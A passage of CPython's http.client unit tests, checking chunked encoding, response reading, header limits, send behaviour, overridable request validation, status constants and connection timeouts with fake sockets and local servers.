# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.create_server((HOST, 0))
self.addCleanup(serv.close)
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'IM_A_TEAPOT',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'UNAVAILABLE_FOR_LEGAL_REASONS',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
'EARLY_HINTS',
'TOO_EARLY'
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.source_port = socket_helper.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
